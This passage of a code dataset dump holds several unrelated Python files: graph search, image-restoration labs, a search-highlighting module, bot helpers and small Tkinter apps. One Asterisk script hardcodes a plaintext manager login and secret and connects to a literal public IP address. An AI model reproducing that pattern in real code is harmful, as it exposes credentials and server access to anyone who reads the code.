csv_reader:\r\n if line_count == 0:\r\n line_count += 1\r\n else:\r\n StateNumber1 = int(row[0])*100000 + int(row[1])\r\n StateNumberStr1 = str(StateNumber1).zfill(7)\r\n StateNumber2 = int(row[3])*100000 + int(row[4])\r\n StateNumberStr2 = str(StateNumber2).zfill(7)\r\n cityDict[StateNumberStr1].add_child(StateNumberStr2, row[2]) \r\n return cityDict\r\n\r\n# https://stackoverflow.com/questions/41760856/most-simple-tree-data-structure-in-python-that-can-be-easily-traversed-in-both\r\nclass Tree(object):\r\n def __init__(self, data, pathcost, children=None, parent=None):\r\n self.data = data\r\n self.PathCost = pathcost\r\n self.children = children or []\r\n self.parent = parent\r\n\r\n def add_child(self, data, pathCost):\r\n new_child = Tree(data, pathCost, parent=self)\r\n self.children.append(new_child)\r\n return new_child\r\n \r\n def is_root(self):\r\n return self.parent is None\r\n\r\n def is_leaf(self):\r\n return not self.children\r\n\r\n def __str__(self):\r\n if self.is_leaf():\r\n return str(self.data)\r\n return '{data} [{children}]'.format(data=self.data, children=', '.join(map(str, self.children))) \r\n\r\ndef main():\r\n # cityGraph is our problem space - all \r\n cityGraph = readinTowns()\r\n frontier = queue.Queue()\r\n frontier_dict = dict()\r\n visited_dict = dict()\r\n file = open(\"BFS_NewEngland_Results.txt\", \"w\")\r\n writer = csv.writer(file)\r\n writer.writerow([\"ID Number\", \"City Name\", \"State\", \"Depth\", \"Excecution Time\", \"Cost\", \"Nodes Expanded\"])\r\n #Goals\r\n start = \"2545000\"\r\n Goal_cities = []\r\n for cities in cityGraph:\r\n if cityGraph[cities].State == \"Massachusetts\" or cityGraph[cities].State == \"Vermont\" or cityGraph[cities].State == \"Rhode Island\" or cityGraph[cities].State == \"Connecticut\" or cityGraph[cities].State == \"Maine\" or cityGraph[cities].State == \"New Hampshire\":\r\n if cityGraph[cities].Number != start:\r\n Goal_cities.append(cityGraph[cities].Number)\r\n\r\n for goal in Goal_cities:\r\n frontier = [priorityQueueObject(cityGraph[start].Number, 0)]; \r\n frontier_dict = dict()\r\n visited_dict = dict()\r\n st = time.time() \r\n # Initial update of current state \r\n current_state = frontier.pop(-1)\r\n frontier_dict[current_state.Number] = Tree(current_state.Number, 0)\r\n goal_reached_flag = 0\r\n no_route = 0\r\n # Goal Check - Loop until we reach goal\r\n while(1):\r\n # Explore on current level - kids is the city ID number [string]\r\n # Iterate through adjacent towns fro current state\r\n for kids in cityGraph[current_state.Number].children:\r\n # Check if the adjacent towns is in visited dict or frontier dict\r\n # Only add if not in visited or frontier\r\n if not(kids in visited_dict.keys()):\r\n if not(kids in frontier_dict.keys()):\r\n # Add children to current state frontier dict\r\n # Children are themselves a tree node\r\n pathCostToChild = current_state.PathCost + float(cityGraph[current_state.Number].children[kids])\r\n frontier_dict[kids] = frontier_dict[current_state.Number].add_child(kids, pathCostToChild)\r\n frontier.append(priorityQueueObject(kids,pathCostToChild ))\r\n if kids == goal:\r\n visited_dict[current_state.Number] = frontier_dict[current_state.Number]\r\n current_state = frontier.pop(0);\r\n goal_reached_flag = 1\r\n break\r\n # Add current state to visited - visited is the main tree we are creating \r\n visited_dict[current_state.Number] = frontier_dict[current_state.Number] \r\n \r\n if goal_reached_flag == 1:\r\n break\r\n \r\n # If no more items in our queue then we cannot reach goal\r\n if len(frontier) == 0:\r\n print(\"No possible route for \" + cityGraph[start].Name + \" to \" + cityGraph[goal].Name)\r\n no_route = 1;\r\n et = time.time()\r\n elapsed_time = et - st\r\n break;\r\n \r\n # Dequeue Current state and delete from fronteir dict \r\n del frontier_dict[current_state.Number]\r\n current_state = frontier.pop(0) \r\n \r\n # Bookeeping - don't add goal to visited in loop - do now for graph traversal\r\n et = time.time()\r\n if (current_state.Number == goal):\r\n no_route = 0;\r\n if not(no_route):\r\n visited_dict[goal] = frontier_dict[goal] \r\n # Print excecution time\r\n elapsed_time = et - st\r\n \r\n\r\n #print('Execution time:', elapsed_time, 'seconds')\r\n #print()\r\n \r\n # Use visited tree to find path found\r\n state = goal\r\n path_reverse_order = list()\r\n while state != start:\r\n path_reverse_order.append(cityGraph[state].Name + \", \" + (cityGraph[state].State))\r\n state = visited_dict[state].parent.data\r\n \r\n # Loop won't add start\r\n path_reverse_order.append(cityGraph[start].Name + \", \" + (cityGraph[start].State))\r\n # Reverse order as we started at goal\r\n path_reverse_order.reverse()\r\n # Print Route\r\n depth =len(path_reverse_order) - 1\r\n #print(\"Depth = \" + str(depth))\r\n finalPathCost = current_state.PathCost\r\n \r\n writer.writerow([cityGraph[goal].Number, cityGraph[goal].Name, cityGraph[goal].State, depth, elapsed_time, finalPathCost, len(visited_dict)])\r\n# for cities in path_reverse_order:\r\n# if cities == (cityGraph[goal].Name + \", \" + cityGraph[goal].State):\r\n# print(cities)\r\n# print(\" \")\r\n# print(\" \")\r\n# else:\r\n# print(cities + \" -> \", end='')\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"serdim01/ECE577","sub_path":"Breadth_First_search_iterate_through_New_England.py","file_name":"Breadth_First_search_iterate_through_New_England.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18473847572","text":"import socket\nfrom time import sleep\n\nami_cmd1 = '''Action: login\nEvents: off\nUsername: mark\nSecret: mysecret\\n\\n'''\n\nami_cmd2 = '''Action: Originate\nChannel: SIP/1001\nContext: outcoling\nExten: 1002\nPriority: 1\nCallerid: 1001\nTimeout: 30000\\n\\n'''\n\ndef ConnectToAsterisk(number=None):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n HOST = '51.140.244.177'\n PORT = 5038\n\n s.connect((HOST, PORT))\n s.send(bytes(ami_cmd1, 'utf-8'))\n sleep(0.1)\n data = s.recv(1024)\n\n calldata = ami_cmd2\n print(calldata)\n s.send(bytes(calldata, 'utf-8'))\n sleep(0.1)\n data = s.recv(1024)\n print(data)\n s.close()\n\nConnectToAsterisk(number=\"1002\")\n\n","repo_name":"denisrogovoy/methodist_modules","sub_path":"CallProject/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4292568384","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @FileName :lab6_3.py\n# @Time :2022-04-23 18:33\n# @Author :钟新宇\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\nfrom EE326_library.Base import plot\nfrom EE326_library.Degradations import motion_blur, full_inverse, limit_inverse, wiener\nfrom lab6.lab6_1 import lab6_1\n\n\ndef lab6_motion_blur(img, path, a, b, T, mode, radius=70, k2=100):\n h = motion_blur(img, a=a, b=b, T=T)\n if mode == \"full\":\n img_motion_blur_full = full_inverse(img, h=h)\n plot(img=img_motion_blur_full, title=\"img_motion_blur_full\",\n path=\"./img_result/\" + path + \"/img_motion_blur_full.png\")\n elif mode == \"limit\":\n img_motion_blur_limit = limit_inverse(img, h=h, radius=radius)\n plot(img=img_motion_blur_limit, title=\"img_motion_blur_limit\",\n path=\"./img_result/\" + path + \"/img_motion_blur_limit.png\")\n elif mode == \"wiener\":\n img_motion_blur_wiener = wiener(img, h=h, k2=k2)\n plot(img=img_motion_blur_wiener, title=\"img_motion_blur_wiener\",\n path=\"./img_result/\" + path + \"/img_motion_blur_wiener.png\")\n\n\ndef lab6_3_1():\n \"\"\"\n no noise\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_1.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n # img = plt.imread(\"./img_source/Q6_3_1.tiff\")\n img = np.array(img, dtype=int)\n # plt.figure()\n # plt.imshow(img, cmap='gray')\n # plt.show()\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"full\")\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"limit\", radius=40)\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"wiener\", k2=100)\n\n\ndef lab6_3_2():\n \"\"\"\n uniform noise;\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_2.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n lab6_1(img, size=3, path=\"lab6_3_2\", q=1.5, noise_var=0.1, d=2, smax=7)\n\n\ndef lab6_3_3():\n \"\"\"\n pepper and salt noise;\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_3.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n lab6_1(img, size=5, path=\"lab6_3_3\", q=1.5, noise_var=0.25, d=2, smax=7)\n\n\nif __name__ == '__main__':\n try:\n # lab6_3_1()\n lab6_3_2()\n # lab6_3_3()\n\n except KeyboardInterrupt:\n pass\n","repo_name":"Linkin999/Digital_Image_Processing","sub_path":"reference/Better/SUSTech_EE326_2022S-main/SUSTech_EE326_Lab/lab6/lab6_3.py","file_name":"lab6_3.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42517067510","text":"from setuptools import setup, find_packages\nimport os\n\nVERSION = '0.1.4'\nLONG_DESCRIPTION = os.linesep.join([open('README.rst').read(),\n open('CHANGELOG.rst').read()])\n\nsetup(\n name='pergenie',\n version=VERSION,\n\n author='Kensuke Numakura',\n author_email='knmkr3gma+pip@gmail.com',\n\n description='perGENIE is a Web/CUI application for personal genome interpretation.',\n long_description=LONG_DESCRIPTION,\n url='https://github.com/perGENIE/pergenie-cli',\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: Healthcare Industry\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Natural Language :: English\",\n \"Natural Language :: Japanese\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Unix\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 2 :: Only\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n ],\n keywords=['bioinformatics', 'personal genome'],\n license='GNU AGPLv3',\n\n packages=find_packages(),\n package_data={'pergenie': ['example/*',\n 'data/*',\n 'test/test_*',\n 'test/testcase_*/*']},\n entry_points={'console_scripts': ['pergenie = pergenie:main']},\n test_suite='test.test_all'\n)\n","repo_name":"perGENIE/pergenie-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17480678146","text":"class Tools:\n\n @staticmethod\n def create_link_to_emp(emp):\n '''\n Создание ссылки на юзера\n '''\n emp_url = f'tg://user?id={emp.id}'\n emp_html = f\"
{emp.fio}\"\n return emp_html\n\n @staticmethod\n def form_list_participants(participants, index=0):\n '''\n Формирование текстового спика поздравляющих или его части(если длина слишком большая)\n '''\n text = \"\"\n for i in range(index, len(participants)):\n if len(text) >= 3500:\n return (text, i)\n text += f\"{i + 1}. {Tools.create_link_to_emp(participants[i].employee)}\\n\"\n\n return (text, None)\n\n @staticmethod\n def form_list_wishes(wishes, index=0):\n '''\n Формирование текстового спика желаний или его части(если длина слишком большая)\n '''\n text = \"\"\n for i in range(index, len(wishes)):\n if len(text) >= 3500:\n return (text, i)\n text += f\"{i + 1}. {wishes[i].text}\\n\"\n\n return (text, None)\n","repo_name":"anatoliyYDev/dr-tg-bot","sub_path":"utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16509937685","text":"from collections import namedtuple\nimport os\n\nMetadata = namedtuple(\"Metadata\", [\"title\", \"lang\", \"authors\", \"description\", \"link\"])\n\n_File = namedtuple(\"File\", [\"url\", \"name\"])\n\n\nclass File(_File):\n def __str__(self):\n return self.name\n\n\nPATH = os.getenv(\n \"PIE_EXTENDED_DOWNLOADS\",\n os.path.normpath(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"..\",\n \"downloads\"\n )\n )\n)\n\n\ndef get_path(module, file):\n return os.path.join(PATH, module, file)\n\n\nclass ObjectCreator:\n \"\"\" Some objects should be reset everytime a new tagging is done. To make this easier\n we provide this class that keeps in memory the initialization parameters.\"\"\"\n def __init__(self, cls, *args, **kwargs):\n self.cls = cls\n self.args = args\n self.kwargs = kwargs\n\n def create(self):\n return self.cls(*self.args, **self.kwargs)\n\n\ndef roman_number(inp: str) -> int:\n \"\"\"\n Source: https://stackoverflow.com/questions/19308177/converting-roman-numerals-to-integers-in-python\n Author: https://stackoverflow.com/users/1201737/r366y\n :param num:\n :return:\n\n >>> roman_number(\"XXIV\")\n 24\n \"\"\"\n roman_numerals = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n result = 0\n for i, c in enumerate(inp.upper()):\n if (i+1) == len(inp) or roman_numerals[c] >= roman_numerals[inp[i+1]]:\n result += roman_numerals[c]\n else:\n result -= roman_numerals[c]\n return result\n","repo_name":"hipster-philology/nlp-pie-taggers","sub_path":"pie_extended/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"17772050789","text":"from itertools import permutations\n\ndef solve():\n n1 = 100\n n2 = 100\n candidate = n1 * n2\n for i in range(899):\n n2 = 100\n for j in range(899):\n ans = n1 * n2\n\n if str(ans) == str(ans)[::-1] and ans > candidate:\n candidate = ans\n\n n2 += 1\n n1 += 1\n print(candidate)\n\nif __name__ == '__main__':\n solve()","repo_name":"matus-jan-lavko/mj-vs-projecteuler","sub_path":"004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23890157131","text":"from manager import Manager\n\nclass Menu:\n def __init__ (self):\n self.manager = Manager()\n self.choices = {\n \"1\" : self.manager.create_order,\n \"2\" : self.manager.see_order, \n \"3\" : self.manager.delete_order, #works\n \"4\" : self.manager.update_order,\n \"5\" : self.manager.save\n }\n##main menu for the pizza store\n def display_menu (self):\n print(\"Welcome to DHMS Pizza!! \")\n print(\"................\")\n\n print(\"\"\" What would you like today??\n 1. Order Pizza\n 2. See All Order\n 3. Cancel My Order \n 4. Update My Order\n 5. Save File\"\"\")\n\n def run(self):\n while True:\n self.display_menu()\n selection = input(\"Enter an option: \" ) \n action = self.choices.get(selection)\n if action:\n action()\n else:\n print(\"{0} is not a valid choice\".format(selection)) \n\n","repo_name":"hrGuTou/DHMS-Custom-Pizza","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17492344522","text":"from __future__ import division\nfrom heapq import nlargest\nfrom cgi import escape as htmlescape\n\n# Fragment object\n\nclass Fragment(object):\n \"\"\"Represents a fragment (extract) from a hit document. This object is\n mainly used to keep track of the start and end points of the fragment; it\n does not contain the text of the fragment or do much else.\n \"\"\"\n \n def __init__(self, tokens, charsbefore=0, charsafter=0, textlen=999999):\n \"\"\"\n :param tokens: list of the Token objects in the fragment. \n :param charsbefore: approx. how many characters before the start of the\n first matched term to include in the fragment.\n :param charsafter: approx. how many characters after the end of the\n last matched term to include in the fragment.\n :param textlen: length in characters of the document text.\n \"\"\"\n \n #: index of the first character of the fragment in the original\n # document\n self.startchar = max(0, tokens[0].startchar - charsbefore)\n #: index after the last character of the fragment in the original\n #document\n self.endchar = min(textlen, tokens[-1].endchar + charsafter)\n self.matches = [t for t in tokens if t.matched]\n self.matched_terms = frozenset(t.text for t in self.matches)\n \n def __len__(self):\n return self.endchar - self.startchar\n \n def overlaps(self, fragment):\n sc = self.startchar\n ec = self.endchar\n fsc = fragment.startchar\n fec = fragment.endchar\n return (fsc > sc and fsc < ec) or (fec > sc and fec < ec)\n \n def overlapped_length(self, fragment):\n sc = self.startchar\n ec = self.endchar\n fsc = fragment.startchar\n fec = fragment.endchar\n return max(ec, fec) - min(sc, fsc)\n \n def has_matches(self):\n return any(t.matched for t in self.tokens)\n \n\n# Filters\n\ndef copyandmatchfilter(termset, tokens):\n for t in tokens:\n t = t.copy()\n t.matched = t.text in termset\n yield t\n\n\n# Fragmenters\n\ndef NullFragmenter(text, tokens):\n \"\"\"Doesn't fragment the token stream. This object just returns the entire\n stream as one \"fragment\". This is useful if you want to highlight the\n entire text.\n \"\"\"\n \n tokens = list(tokens)\n before = after = 0\n if tokens:\n before = tokens[0].startchar\n after = len(text) - tokens[-1].endchar\n return [Fragment(tokens, charsbefore=before, charsafter=after)]\n\n\nclass SimpleFragmenter(object):\n \"\"\"Simply splits the text into roughly equal sized chunks.\n \"\"\"\n \n def __init__(self, size=70):\n \"\"\"\n :param size: size (in characters) to chunk to. The chunking is based on\n tokens, so the fragments will usually be smaller.\n \"\"\"\n self.size = size\n \n def __call__(self, text, tokens):\n size = self.size\n first = None\n frag = []\n \n for t in tokens:\n if first is None:\n first = t.startchar\n \n if t.endchar - first > size:\n first = None\n if frag:\n yield Fragment(frag)\n frag = []\n \n frag.append(t)\n \n if frag:\n yield Fragment(frag)\n\n\nclass SentenceFragmenter(object):\n \"\"\"Breaks the text up on sentence end punctuation characters\n (\".\", \"!\", or \"?\"). This object works by looking in the original text for a\n sentence end as the next character after each token's 'endchar'.\n \n When highlighting with this fragmenter, you should use an analyzer that\n does NOT remove stop words, for example::\n \n sa = StandardAnalyzer(stoplist=None)\n \"\"\"\n \n def __init__(self, maxchars=200, sentencechars=\".!?\"):\n \"\"\"\n :param maxchars: The maximum number of characters allowed in a fragment.\n \"\"\"\n \n self.maxchars = maxchars\n self.sentencechars = frozenset(sentencechars)\n \n def __call__(self, text, tokens):\n maxchars = self.maxchars\n sentencechars = self.sentencechars\n textlen = len(text)\n first = None\n frag = []\n \n for t in tokens:\n if first is None:\n first = t.startchar\n endchar = t.endchar\n \n if endchar - first > maxchars:\n first = None\n if frag:\n yield Fragment(frag)\n frag = []\n \n frag.append(t)\n if frag and endchar < textlen and text[endchar] in sentencechars:\n # Don't break for two periods in a row (e.g. ignore \"...\")\n if endchar + 1 < textlen and text[endchar + 1] in sentencechars:\n continue\n \n yield Fragment(frag, charsafter=0)\n frag = []\n first = None\n \n if frag:\n yield Fragment(frag)\n\n\nclass ContextFragmenter(object):\n \"\"\"Looks for matched terms and aggregates them with their surrounding\n context.\n \n This fragmenter only yields fragments that contain matched terms.\n \"\"\"\n \n def __init__(self, termset, maxchars=200, surround=20):\n \"\"\"\n :param termset: A collection (probably a set or frozenset) containing\n the terms you want to match to token.text attributes.\n :param maxchars: The maximum number of characters allowed in a\n fragment.\n :param surround: The number of extra characters of context to add both\n before the first matched term and after the last matched term.\n \"\"\"\n \n self.maxchars = maxchars\n self.charsbefore = self.charsafter = surround\n \n def __call__(self, text, tokens):\n maxchars = self.maxchars\n charsbefore = self.charsbefore\n charsafter = self.charsafter\n \n current = []\n currentlen = 0\n countdown = -1\n for t in tokens:\n if t.matched:\n countdown = charsafter\n \n current.append(t)\n \n length = t.endchar - t.startchar\n currentlen += length\n \n if countdown >= 0:\n countdown -= length\n \n if countdown < 0 or currentlen >= maxchars:\n yield Fragment(current)\n current = []\n currentlen = 0\n \n else:\n while current and currentlen > charsbefore:\n t = current.pop(0)\n currentlen -= t.endchar - t.startchar\n\n if countdown >= 0:\n yield Fragment(current)\n\n\n#class VectorFragmenter(object):\n# def __init__(self, termmap, maxchars=200, charsbefore=20, charsafter=20):\n# \"\"\"\n# :param termmap: A dictionary mapping the terms you're looking for to\n# lists of either (posn, startchar, endchar) or\n# (posn, startchar, endchar, boost) tuples.\n# :param maxchars: The maximum number of characters allowed in a fragment.\n# :param charsbefore: The number of extra characters of context to add before\n# the first matched term.\n# :param charsafter: The number of extra characters of context to add after\n# the last matched term.\n# \"\"\"\n# \n# self.termmap = termmap\n# self.maxchars = maxchars\n# self.charsbefore = charsbefore\n# self.charsafter = charsafter\n# \n# def __call__(self, text, tokens):\n# maxchars = self.maxchars\n# charsbefore = self.charsbefore\n# charsafter = self.charsafter\n# textlen = len(text)\n# \n# vfrags = []\n# for term, data in self.termmap.iteritems():\n# if len(data) == 3:\n# t = Token(startchar = data[1], endchar = data[2])\n# elif len(data) == 4:\n# t = Token(startchar = data[1], endchar = data[2], boost = data[3])\n# else:\n# raise ValueError(repr(data))\n# \n# newfrag = VFragment([t], charsbefore, charsafter, textlen)\n# added = False\n# \n# for vf in vfrags:\n# if vf.overlaps(newfrag) and vf.overlapped_length(newfrag) < maxchars:\n# vf.merge(newfrag)\n# added = True\n# break\n\n\n# Fragment scorers\n\ndef BasicFragmentScorer(f):\n # Add up the boosts for the matched terms in this passage\n score = sum(t.boost for t in f.matches)\n \n # Favor diversity: multiply score by the number of separate\n # terms matched\n score *= len(f.matched_terms) * 100\n \n return score\n\n\n# Fragment sorters\n\ndef SCORE(fragment):\n \"Sorts higher scored passages first.\"\n return None\ndef FIRST(fragment):\n \"Sorts passages from earlier in the document first.\"\n return fragment.startchar\ndef LONGER(fragment):\n \"Sorts longer passages first.\"\n return 0 - len(fragment)\ndef SHORTER(fragment):\n \"Sort shorter passages first.\"\n return len(fragment)\n\n\n# Formatters\n\nclass UppercaseFormatter(object):\n \"\"\"Returns a string in which the matched terms are in UPPERCASE.\n \"\"\"\n \n def __init__(self, between=\"...\"):\n \"\"\"\n :param between: the text to add between fragments.\n \"\"\"\n \n self.between = between\n \n def _format_fragment(self, text, fragment):\n output = []\n index = fragment.startchar\n \n for t in fragment.matches:\n if t.startchar > index:\n output.append(text[index:t.startchar])\n \n ttxt = text[t.startchar:t.endchar]\n if t.matched: ttxt = ttxt.upper()\n output.append(ttxt)\n index = t.endchar\n \n output.append(text[index:fragment.endchar])\n return \"\".join(output)\n\n def __call__(self, text, fragments):\n return self.between.join((self._format_fragment(text, fragment)\n for fragment in fragments))\n\n\nclass HtmlFormatter(object):\n \"\"\"Returns a string containing HTML formatting around the matched terms.\n \n This formatter wraps matched terms in an HTML element with two class names.\n The first class name (set with the constructor argument ``classname``) is\n the same for each match. The second class name (set with the constructor\n argument ``termclass`` is different depending on which term matched. This\n allows you to give different formatting (for example, different background\n colors) to the different terms in the excerpt.\n \n >>> hf = HtmlFormatter(tagname=\"span\", classname=\"match\", termclass=\"term\")\n >>> hf(mytext, myfragments)\n \"The template geometry is...\"\n \n This object maintains a dictionary mapping terms to HTML class names (e.g.\n ``term0`` and ``term1`` above), so that multiple excerpts will use the same\n class for the same term. If you want to re-use the same HtmlFormatter\n object with different searches, you should call HtmlFormatter.clear()\n between searches to clear the mapping.\n \"\"\"\n \n template = '<%(tag)s class=%(q)s%(cls)s%(tn)s%(q)s>%(t)s'\n \n def __init__(self, tagname=\"strong\", between=\"...\",\n classname=\"match\", termclass=\"term\", maxclasses=5,\n attrquote='\"'):\n \"\"\"\n :param tagname: the tag to wrap around matching terms.\n :param between: the text to add between fragments.\n :param classname: the class name to add to the elements wrapped around\n matching terms.\n :param termclass: the class name prefix for the second class which is\n different for each matched term.\n :param maxclasses: the maximum number of term classes to produce. This\n limits the number of classes you have to define in CSS by recycling\n term class names. For example, if you set maxclasses to 3 and have\n 5 terms, the 5 terms will use the CSS classes ``term0``, ``term1``,\n ``term2``, ``term0``, ``term1``.\n \"\"\"\n \n self.between = between\n self.tagname = tagname\n self.classname = classname\n self.termclass = termclass\n self.attrquote = attrquote\n self.maxclasses = maxclasses\n self.seen = {}\n \n def _format_fragment(self, text, fragment, seen):\n htmlclass = \" \".join((self.classname, self.termclass))\n \n output = []\n index = fragment.startchar\n \n for t in fragment.matches:\n if t.startchar > index:\n output.append(text[index:t.startchar])\n \n ttxt = htmlescape(text[t.startchar:t.endchar])\n if t.matched:\n if t.text in seen:\n termnum = seen[t.text]\n else:\n termnum = len(seen) % self.maxclasses\n seen[t.text] = termnum\n ttxt = self.template % {\"tag\": self.tagname,\n \"q\": self.attrquote,\n \"cls\": htmlclass,\n \"t\": ttxt, \"tn\": termnum}\n output.append(ttxt)\n index = t.endchar\n \n if index < fragment.endchar:\n output.append(text[index:fragment.endchar])\n \n return \"\".join(output)\n \n def __call__(self, text, fragments):\n seen = self.seen\n return self.between.join(self._format_fragment(text, fragment, seen)\n for fragment in fragments)\n \n def clear(self):\n \"\"\"Clears the dictionary mapping terms to HTML classnames.\n \"\"\"\n self.seen = {}\n\n\nclass GenshiFormatter(object):\n \"\"\"Returns a Genshi event stream containing HTML formatting around the\n matched terms.\n \"\"\"\n \n def __init__(self, qname=\"strong\", between=\"...\"):\n \"\"\"\n :param qname: the QName for the tag to wrap around matched terms.\n :param between: the text to add between fragments.\n \"\"\"\n \n self.qname = qname\n self.between = between\n \n from genshi.core import START, END, TEXT, Attrs, Stream #@UnresolvedImport\n self.START, self.END, self.TEXT = START, END, TEXT\n self.Attrs, self.Stream = Attrs, Stream\n\n def _add_text(self, text, output):\n if output and output[-1][0] == self.TEXT:\n output[-1] = (self.TEXT, output[-1][1] + text, output[-1][2])\n else:\n output.append((self.TEXT, text, (None, -1, -1)))\n\n def _format_fragment(self, text, fragment):\n START, TEXT, END, Attrs = self.START, self.TEXT, self.END, self.Attrs\n qname = self.qname\n output = []\n \n index = fragment.startchar\n lastmatched = False\n for t in fragment.matches:\n if t.startchar > index:\n if lastmatched:\n output.append((END, qname, (None, -1, -1)))\n lastmatched = False\n self._add_text(text[index:t.startchar], output)\n \n ttxt = text[t.startchar:t.endchar]\n if not lastmatched:\n output.append((START, (qname, Attrs()), (None, -1, -1)))\n lastmatched = True\n output.append((TEXT, ttxt, (None, -1, -1)))\n \n index = t.endchar\n \n if lastmatched:\n output.append((END, qname, (None, -1, -1)))\n \n return output\n\n def __call__(self, text, fragments):\n output = []\n first = True\n for fragment in fragments:\n if not first:\n self._add_text(self.between, output)\n first = False\n output += self._format_fragment(text, fragment)\n \n return self.Stream(output)\n\n\n# Highlighting\n\ndef top_fragments(text, terms, analyzer, fragmenter, top=3,\n scorer=BasicFragmentScorer, minscore=1):\n termset = frozenset(terms)\n tokens = copyandmatchfilter(termset, analyzer(text, chars=True,\n keeporiginal=True))\n scored_frags = nlargest(top, ((scorer(f), f)\n for f in fragmenter(text, tokens)))\n return [sf for score, sf in scored_frags if score > minscore]\n\n\ndef highlight(text, terms, analyzer, fragmenter, formatter, top=3,\n scorer=BasicFragmentScorer, minscore=1,\n order=FIRST):\n \n fragments = top_fragments(text, terms, analyzer, fragmenter,\n top=top, minscore=minscore)\n fragments.sort(key=order)\n return formatter(text, fragments)\n \n\nif __name__ == '__main__':\n pass\n\n\n\n\n","repo_name":"Alfanous-team/alfanous","sub_path":"src/alfanous/Support/whoosh/highlight.py","file_name":"highlight.py","file_ext":"py","file_size_in_byte":16930,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"37"} +{"seq_id":"27418826500","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\nfrom tkinter.messagebox import *\nfrom tkinter import Tk, Button\nfrom Facturas import imprimirFactura\n\ndef actualizarClientes(event):\n cliente = clientes.current()\n\ndef actualizarProveedores(event):\n proveedor = proveedores.current()\n\ndef actualizarProductos(event):\n producto = Nombreproductos.current()\n\ndef actualizarPrecioProductos(event):\n precioProducto = Precioproductos.current()\n\ndef guardar():\n connection = sqlite3.connect('base.db')\n cursor = connection.cursor()\n\n id = codFactura.get()\n cliente = clientes.get()\n proveedor = proveedores.get()\n producto = Nombreproductos.get()\n precio = Precioproductos.get()\n\n try:\n cursor.execute('''\n CREATE TABLE IF NOT EXISTS generar_facturas (\n id INTEGER PRIMARY KEY AUTOINCREMENT, \n cliente VARCHAR(60) NOT NULL, \n proveedor VARCHAR(60) NOT NULL, \n nombre_producto VARCHAR(60) NOT NULL,\n precio_producto VARCHAR(60) NOT NULL)\n ''')\n print(\"Tabla creada correctamente\")\n except sqlite3.OperationalError as error:\n print(\"Error al abrir: \", error)\n\n registro = \"INSERT INTO generar_facturas (cliente, proveedor, nombre_producto, precio_producto) VALUES(?, ?, ?, ?)\"\n cursor.execute(registro, [cliente, proveedor, producto, precio])\n connection.commit()\n\n tabla.delete(*tabla.get_children())\n\n cursor.execute(\"SELECT * FROM generar_facturas\")\n\n i = 0\n for a in cursor:\n tabla.insert(\"\", i, text=\"\", values=(a[0], a[1], a[2], a[3], a[4]))\n i += 1\n tabla.place(x=450, y=450)\n\n mostrar()\n continuar()\n\n\ndef mostrar():\n try:\n botonGuardar['state'] = 'disabled'\n conexion = sqlite3.connect(\"base.db\")\n cursor = conexion.cursor()\n registro = \"SELECT * FROM generar_factura;\"\n cursor.execute(registro)\n factura = cursor.fetchall()\n print(factura)\n\n except sqlite3.OperationalError as error:\n print(\"Error al abrir:\", error)\n\n\ndef continuar():\n dato = tk.messagebox.askyesno(message=\"¿Desea continuar?\", title=\"Título\", parent=marco)\n if dato == True:\n botonGuardar['state'] = 'normal'\n codFactura.delete(0, 'end')\n clientes.delete(0, 'end')\n proveedores.delete(0, 'end')\n Nombreproductos.delete(0, 'end')\n Precioproductos.delete(0, 'end')\n elif dato == False:\n marco.destroy()\n\nglobal codigoSeleccionado\ncodigoSeleccionado = None\nglobal datosFactura\n\ndef onSelected(evnt):\n for a in tabla.selection():\n item = tabla.item(a)\n cod, 